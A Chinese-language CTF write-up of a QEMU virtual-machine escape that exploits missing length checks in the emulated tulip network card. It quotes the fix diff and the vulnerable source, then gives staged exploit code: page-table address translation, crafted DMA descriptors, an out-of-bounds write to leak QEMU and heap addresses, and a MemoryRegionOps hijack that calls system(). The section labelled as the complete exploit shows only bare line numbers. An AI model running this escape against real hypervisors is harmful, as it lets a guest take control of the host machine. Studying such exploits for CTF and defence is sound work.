int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

+ if (s->tx_frame_len + len1 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

+ if (s->tx_frame_len + len2 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
+
+ return 0;
}

static void tulip_setup_filter_addr(TULIPState *s, uint8_t *buf, int n)
@@ -651,13 +661,15 @@

static void tulip_xmit_list_update(TULIPState *s)
{
+#define TULIP_DESC_MAX 128
+ uint8_t i = 0;
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) {
return;
}

- for (;;) {
+ for (i = 0; i < TULIP_DESC_MAX; i++) {
tulip_desc_read(s, s->current_tx_desc, &desc);
tulip_dump_tx_descriptor(s, &desc);

@@ -675,10 +687,10 @@
s->tx_frame_len = 0;
}

- tulip_copy_tx_buffers(s, &desc);
-
- if (desc.control & TDES1_LS) {
- tulip_tx(s, &desc);
+ if (!tulip_copy_tx_buffers(s, &desc)) {
+ if (desc.control & TDES1_LS) {
+ tulip_tx(s, &desc);
+ }
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);

可以发现函数 tulip_copy_tx_buffers 中缺少了一个检查,核心代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
/* Excerpt of tulip_copy_tx_buffers: append both descriptor buffers to
 * tx_frame.  No check is made that tx_frame_len + lenN stays within
 * tx_frame before either copy. */
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1; /* running offset grows on every call */
}

if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
/* Status is 0 when any data was copied, 0x7fffffff when both lengths are 0. */
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
  • tulip_copy_tx_buffers 是 QEMU tulip 网卡模拟代码(hw/net/tulip.c)中的函数,用于通过 DMA 把客户机发送描述符所指向的缓冲区数据读入 s->tx_frame
  • 当我们多次调用 tulip_copy_tx_buffers 时,s->tx_frame_len 可能被加到一个非常大的值

未对虚拟机传入的长度字段进行校验,导致产生了针对 tx_frame 和 rx_frame 的数组越界写,这两个数组都是结构体 TULIPState 的条目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/* Per-device state of the emulated tulip NIC (vulnerable layout: the three
 * frame length fields are plain int). */
typedef struct TULIPState
{
PCIDevice dev; /* embedded PCI device object (a member, not a pointer) */
MemoryRegion io; /* embedded memory region; per the original note, the device's I/O address space */
MemoryRegion memory; /* embedded memory region; per the original note, the device's memory address space */
NICConf c;
qemu_irq irq; /* interrupt line of the adapter */
NICState *nic;
eeprom_t *eeprom;
uint32_t csr[16]; /* values of the sixteen 32-bit CSR registers */

/* state for MII */
uint32_t old_csr9;
uint32_t mii_word;
uint32_t mii_bitcnt;

hwaddr current_rx_desc; /* address of the current receive descriptor */
hwaddr current_tx_desc; /* address of the current transmit descriptor */

uint8_t rx_frame[2048]; /* receive buffer */
uint8_t tx_frame[2048]; /* transmit buffer, filled by tulip_copy_tx_buffers */
int tx_frame_len; /* bytes accumulated in tx_frame so far */
int rx_frame_len; /* bytes of the received frame not yet copied to the guest */
int rx_frame_size; /* size of the frame held in rx_frame */

uint32_t rx_status; /* receive status, per the original note */
uint8_t filter[16][6]; /* 16 filter entries of 6 bytes each */
} TULIPState;

程序分析

本题目找不到 tulip.ko 的设备标识符:

1
2
3
/ # find . -name tulip
./sys/bus/pci/drivers/tulip
./sys/module/tulip

IDA 分析发现,tulip.ko 只注册了驱动,但是没有注册设备标识符:(其实 Qemu 逃逸类题目和内核题目不同,大多数时候都不需要设备标识符)

1
2
3
4
5
6
7
8
9
10
11
12
13
// tulip_init (decompiler output): module init for tulip.ko.  Prints the
// version, applies a default to csr0 when it is zero, copies two tunables
// into driver globals, and registers the PCI driver under the name "tulip".
__int64 __fastcall tulip_init(__int64 a1, __int64 a2)
{
_fentry__(a1, a2);
printk(&unk_94CF, version);
if ( !csr0 )
{
printk(&unk_A6F0, version);
csr0 = 0xA04800;
}
tulip_rx_copybreak = rx_copybreak;
tulip_max_interrupt_work = max_interrupt_work;
return _pci_register_driver(&tulip_driver, &_this_module, "tulip");
}

先使用 info pci 查看 qemu 的 PCI 设备:

1
2
3
4
5
6
7
Bus  0, device   4, function 0:
Ethernet controller: PCI device 1011:0019
PCI subsystem 103c:104f
IRQ 11.
BAR0: I/O at 0xc000 [0xc07f].
BAR1: 32 bit memory at 0xfebf1000 [0xfebf107f].
id ""
  • 需要先在 run.sh 中添加 -monitor telnet:127.0.0.1:4444,server,nowait 选项
  • 然后使用 nc 127.0.0.1 4444 连接 monitor,并执行 info pci 进行查看

基于 0xc000 我们就可以使用 pmio 来调用 tulip_read 和 tulip_write:

1
2
3
4
5
6
7
8
9
/*
 * Access callbacks for the tulip register window: reads go to tulip_read,
 * writes go to tulip_write. The implementation is declared as handling
 * exactly 4-byte accesses (impl.min_access_size == impl.max_access_size == 4).
 */
static const MemoryRegionOps tulip_ops = {
.read = tulip_read,
.write = tulip_write,
.endianness = DEVICE_LITTLE_ENDIAN,
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};

函数 tulip_write 的功能较为复杂,这里只分析我们需要的部分:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#define CSR6_FC         BIT(12)
#define CSR6_ST BIT(13)

/*
 * Register write handler (excerpt; "......" marks code elided by the
 * write-up). Only the CSR3..CSR6 cases relevant to the exploit are shown:
 *   CSR3 - set the receive descriptor address
 *   CSR4 - set the transmit descriptor address and walk the TX list
 *   CSR5 - status register, written bits are cleared
 *   CSR6 - start/stop receive and transmit
 */
static void tulip_write(void *opaque, hwaddr addr,
uint64_t data, unsigned size)
{
TULIPState *s = opaque;
trace_tulip_reg_write(addr, tulip_reg_name(addr), size, data);

switch (addr)
{
......

case CSR(3):
s->csr[3] = data & ~3ULL;
s->current_rx_desc = s->csr[3]; /* guest address of the receive descriptor */
qemu_flush_queued_packets(qemu_get_queue(s->nic)); /* flush packets queued for this NIC */
break;

case CSR(4):
s->csr[4] = data & ~3ULL;
s->current_tx_desc = s->csr[4]; /* guest address of the transmit descriptor */
tulip_xmit_list_update(s); /* reaches the vulnerable tulip_copy_tx_buffers */
break;

case CSR(5):
/* Status register, write clears bit */
s->csr[5] &= ~(data & (CSR5_TI | CSR5_TPS | CSR5_TU | CSR5_TJT |
CSR5_LNP_ANC | CSR5_UNF | CSR5_RI | CSR5_RU |
CSR5_RPS | CSR5_RWT | CSR5_ETI | CSR5_GTE |
CSR5_LNF | CSR5_FBE | CSR5_ERI | CSR5_AIS |
CSR5_NIS | CSR5_GPI | CSR5_LC));
tulip_update_int(s);
break;

case CSR(6):
s->csr[6] = data;
/* CSR6_SR selects the receive state */
if (s->csr[6] & CSR6_SR)
{
tulip_update_rs(s, CSR5_RS_RUNNING_WAIT_RECEIVE);
qemu_flush_queued_packets(qemu_get_queue(s->nic));
}
else
{
tulip_update_rs(s, CSR5_RS_STOPPED);
}

/* CSR6_ST puts the transmit state into SUSPENDED, which tulip_xmit_list_update requires */
if (s->csr[6] & CSR6_ST)
{
tulip_update_ts(s, CSR5_TS_SUSPENDED);
tulip_xmit_list_update(s); /* reaches the vulnerable tulip_copy_tx_buffers */
}
else
{
tulip_update_ts(s, CSR5_TS_STOPPED);
}
break;

......

default:
qemu_log_mask(LOG_GUEST_ERROR, "%s: write to CSR at unknown address "
"0x%" PRIx64 "\n",
__func__, addr);
break;
}
}

函数 tulip_xmit_list_update 会间接调用漏洞函数,我们可以分析一下调用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * Walk the transmit descriptor list starting at s->current_tx_desc
 * (excerpt; "......" marks code elided by the write-up, including the
 * loop's exit conditions). For non-setup descriptors the payload is
 * copied with tulip_copy_tx_buffers and, when TDES1_LS is set, handed
 * to tulip_tx.
 */
static void tulip_xmit_list_update(TULIPState *s)
{
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) /* nothing to do unless the transmit state is SUSPENDED */
{
return;
}

for (;;)
{
tulip_desc_read(s, s->current_tx_desc, &desc); /* fetch the descriptor at s->current_tx_desc into desc */
tulip_dump_tx_descriptor(s, &desc); /* NOTE(review): by its name this dumps/traces the descriptor; the original note claimed it performs PCI DMA - verify */

......

if (desc.control & TDES1_SET)
{
......
}
else
{
......
tulip_copy_tx_buffers(s, &desc); /* the vulnerable copy */
if (desc.control & TDES1_LS)
{
tulip_tx(s, &desc); /* transmit (or loop back) the assembled frame */
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);
tulip_next_tx_descriptor(s, &desc);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
 * Append the descriptor's two guest buffers to s->tx_frame.
 *
 * VULNERABLE: len1/len2 come straight from the guest-controlled
 * desc->control and are never checked against the space left in
 * tx_frame (2048 bytes). Repeated calls keep growing s->tx_frame_len,
 * so the DMA destination s->tx_frame + s->tx_frame_len can point past
 * the array (or, once tx_frame_len has been overwritten with a negative
 * value, before it).
 */
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
/* buffer sizes are bit-fields of the guest-supplied control word */
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

if (len1)
{
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
/* copies len1 bytes from guest address desc->buf_addr1 to tx_frame + tx_frame_len */
s->tx_frame_len += len1;
}

if (len2)
{
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

  • 调用链为:tulip_write -> tulip_xmit_list_update -> tulip_copy_tx_buffers -> pci_dma_read
  • 条件为:tulip_ts(s) == CSR5_TS_SUSPENDED

在设置了 TDES1_LS 后,则会调用 tulip_tx 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Send the frame accumulated in s->tx_frame. When the operating-mode
 * bits of CSR6 are non-zero the frame is looped back into tulip_receive,
 * otherwise it is handed to the network backend. Raises CSR5_TI when the
 * descriptor requests it via TDES1_IC.
 */
static void tulip_tx(TULIPState *s, struct tulip_descriptor *desc)
{
if (s->tx_frame_len) {
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
} else {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
}

if (desc->control & TDES1_IC) {
s->csr[5] |= CSR5_TI;
tulip_update_int(s);
}
}

  • 在满足 (s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK 条件后则会调用 tulip_receive
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
 * Deliver a frame of `size` bytes from `buf` to the guest through the
 * receive descriptor list.
 *
 * Returns 0 when the frame is rejected (size outside 14..2048 or the
 * receiver is stopped), `size` when it was filtered out or delivered,
 * and rx_frame_size - rx_frame_len when no descriptor is owned by the
 * device.
 *
 * Note: the memcpy into rx_frame only happens when s->rx_frame_len is 0.
 * If rx_frame_len / rx_frame_size already hold other values, they are
 * used as-is by tulip_copy_rx_bytes.
 */
static ssize_t tulip_receive(TULIPState *s, const uint8_t *buf, size_t size)
{
struct tulip_descriptor desc;

trace_tulip_receive(buf, size);

if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
return 0;
}

if (!tulip_filter_address(s, buf)) {
return size;
}

do {
tulip_desc_read(s, s->current_rx_desc, &desc);
tulip_dump_rx_descriptor(s, &desc);

/* descriptor not owned by the device: flag "receive buffer unavailable" and stop */
if (!(desc.status & RDES0_OWN)) {
s->csr[5] |= CSR5_RU;
tulip_update_int(s);
return s->rx_frame_size - s->rx_frame_len;
}
desc.status = 0;

/* first descriptor of a new frame: stage the data and record its size (+4) */
if (!s->rx_frame_len) {
s->rx_frame_size = size + 4;
s->rx_status = RDES0_LS |
((s->rx_frame_size & RDES0_FL_MASK) << RDES0_FL_SHIFT);
desc.status |= RDES0_FS;
memcpy(s->rx_frame, buf, size);
s->rx_frame_len = s->rx_frame_size;
}

tulip_copy_rx_bytes(s, &desc); /* copy pending bytes from rx_frame into the guest buffers named by the descriptor */

/* whole frame delivered: publish the status and raise the receive interrupt */
if (!s->rx_frame_len) {
desc.status |= s->rx_status;
s->csr[5] |= CSR5_RI;
tulip_update_int(s);
}
tulip_dump_rx_descriptor(s, &desc);
tulip_desc_write(s, s->current_rx_desc, &desc);
tulip_next_rx_descriptor(s, &desc);
} while (s->rx_frame_len);
return size;
}

函数 tulip_copy_rx_bytes 的作用和 tulip_copy_tx_buffers 相反:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
 * Copy the not-yet-delivered part of s->rx_frame into the descriptor's
 * two guest buffers and decrease s->rx_frame_len accordingly.
 *
 * Each copy length is min(buffer size, rx_frame_len), but the source
 * offset rx_frame_size - rx_frame_len is never checked against the
 * 2048-byte rx_frame array. If those two fields hold forged values the
 * DMA write reads beyond rx_frame and discloses that memory to the guest.
 */
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
/* buffer sizes are bit-fields of the guest-supplied control word */
int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
int len;

if (s->rx_frame_len && len1)
{
if (s->rx_frame_len > len1)
{
len = len1;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
/* copies len bytes starting at rx_frame + rx_frame_size - rx_frame_len to guest address buf_addr1 */
s->rx_frame_len -= len;
}

if (s->rx_frame_len && len2)
{
if (s->rx_frame_len > len2)
{
len = len2;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
}
  • tulip_copy_rx_bytes 中也同样没有检查 size 范围,可以将 rx_frame 后的数据读取到用户空间

核心结构体 tulip_descriptor 的代码如下:

1
2
3
4
5
6
/* One 16-byte tulip DMA descriptor as laid out in guest memory. */
struct tulip_descriptor {
uint32_t status;    /* status word; the receive path tests RDES0_OWN in it */
uint32_t control;   /* control flags plus the two buffer-size bit-fields */
uint32_t buf_addr1; /* guest address of the first data buffer */
uint32_t buf_addr2; /* guest address of the second data buffer */
};

入侵思路

tulip_xmit_list_update 中会从 current_tx_desc 中读取网络适配器的描述符:

1
2
tulip_desc_read(s, s->current_tx_desc, &desc); /* 从s->current_tx_desc中读取网络适配器的描述符,并写入desc */
tulip_dump_tx_descriptor(s, &desc);
  • 此时 tulip_desc_read 函数需要传入物理地址

我们可以通过 /proc/self/pagemap 计算出物理地址:

1
2
3
4
5
6
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}

1
2
3
4
/* Return the offset of addr inside its page (the low PAGE_SHIFT bits). */
uint32_t page_offset(uint32_t addr) {
    uint32_t low_bits = (1 << PAGE_SHIFT) - 1;

    return addr & low_bits;
}

1
2
3
4
5
6
7
8
9
10
11
12
/*
 * Translate a guest virtual address into its guest frame number by
 * reading the matching 8-byte entry of /proc/self/pagemap through the
 * global descriptor `fd`.
 *
 * Returns the frame number, or (uint64_t)-1 when the entry cannot be
 * read or the page is not present. Failed seeks and short reads are now
 * reported instead of parsing an uninitialised entry.
 */
uint64_t gva_to_gfn(void *addr) {
    uint64_t pme;
    size_t offset;

    /* (addr >> PAGE_SHIFT) * 8: one 64-bit entry per 4 KiB page */
    offset = ((uintptr_t)addr >> 9) & ~7;
    if (lseek(fd, offset, SEEK_SET) < 0)
        return -1;
    if (read(fd, &pme, sizeof pme) != (int)sizeof pme)
        return -1;
    if (!(pme & PFN_PRESENT))
        return -1;
    return pme & PFN_PFN;
}

1
2
3
4
5
6
/*
 * Translate a guest virtual address into a guest physical address:
 * frame number from gva_to_gfn shifted by PAGE_SHIFT, combined with the
 * in-page offset. Aborts via assert when the page has no frame.
 */
uint64_t gva_to_gpa(void *addr) {
    uint64_t frame = gva_to_gfn(addr);
    uint64_t in_page;

    assert(frame != -1);
    in_page = page_offset((uint64_t)addr);
    return (frame << PAGE_SHIFT) | in_page;
}

如果我们将 tx_frame_len 设置为 0x800,那么接下来往 tx_frame[2048] 中写的数据就会越过数组末尾,覆盖其后的成员(tx_frame_len、rx_frame_len、rx_frame_size 等)

下面是测试代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

接着我们就可以通过 pci_dma_read 函数修改 TULIPState->tx_frame 往后的数据,然后利用 pci_dma_write 泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1));
/* 0x800: 使"s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK"成立,从而使tulip_tx能够调用tulip_receive */
/* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */
/* (1u << 1)为CSR6_SR: 设置CSR5_RS_RUNNING_WAIT_RECEIVE */

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa); /* 设置rx_desc */

struct oob_data { /* 描述TULIPState->tx_frame的后续数据 */
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x400 - len1; /* 伪造>tx_frame_len为0x400 */
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900; /* 使rx_frame发生溢出 */
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

泄露 qemu_base 和 heap_base 以后,我们就可以劫持并伪造 TULIPState->MemoryRegion->MemoryRegionOps 来执行我们需要的函数:

1
2
3
4
5
6
struct MemoryRegion {
......
const MemoryRegionOps *ops;
......
};

测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70; /* 向上溢出 */
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // 指向MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa); /* 覆盖ops.write */

pmio_writel(CSR(4), tx_desc_gpa); /* 触发ops.write */
}

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
